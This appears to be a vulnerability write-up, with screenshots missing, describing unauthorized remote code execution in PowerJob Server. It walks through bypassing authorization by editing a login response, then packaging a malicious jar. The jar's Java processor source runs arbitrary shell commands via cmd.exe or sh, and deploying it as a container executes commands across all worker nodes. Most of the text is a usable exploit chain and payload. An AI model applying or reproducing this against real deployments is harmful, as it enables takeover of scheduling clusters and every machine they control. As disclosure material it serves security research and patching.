PowerJob Server Unauthorized Remote Code Execution
PowerJob Remote Code Execution
First, open the homepage, click the App Registration button:
Then use the application and password just registered to log in, capture the package and modify the data field in the return package, and now I can log in to the background of other applications beyond my authority:
We can click Container DevOps - Template generator, fill in the information and get a zip package.
Then we add our own malicious code to the package,just like this :
Using the maven package command to package the jar, now I have packaged a malicious jar file:
payload
Source Code:
@Component
public class SimpleProcessor implements BasicProcessor {
@Override
public ProcessResult process(TaskContext taskContext) {
OmsLogger omsLogger = taskContext.getOmsLogger();
omsLogger.info("SimpleProcessor start to process, current JobParams is {}.", taskContext.getJobParams());
String command = taskContext.getInstanceParams();
ProcessBuilder builder = new ProcessBuilder();
Process process = null;
try {
if (SystemUtils.IS_OS_WINDOWS) {
process = builder.command("cmd.exe", "/c", command).redirectErrorStream(true).start();
} else {
process = builder.command("sh", "-c", command).redirectErrorStream(true).start();
}
InputStream inputStream = process.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
String line;
while ((line = reader.readLine()) != null) {
omsLogger.info(line);
}
} catch (IOException e) {
throw new RuntimeException(e);
}
return new ProcessResult(true, "simple processor finished with params=" + command);
}
}
Click Container Management,New container,FastJar,Upload a malicious jar file:
Click save button,Now we can see the container:
Now click the deploy button to inject malicious code into all nodes:
Then go to the task management page, click the New job button, fill in the information like this
container’s ID#org.example.demo.SimpleProcessor
Schedule info:API
Click More in the task list and the parameters run:
Enter the command to execute, the command will be executed in all machine nodes:
After a few seconds all nodes will execute the command you just entered::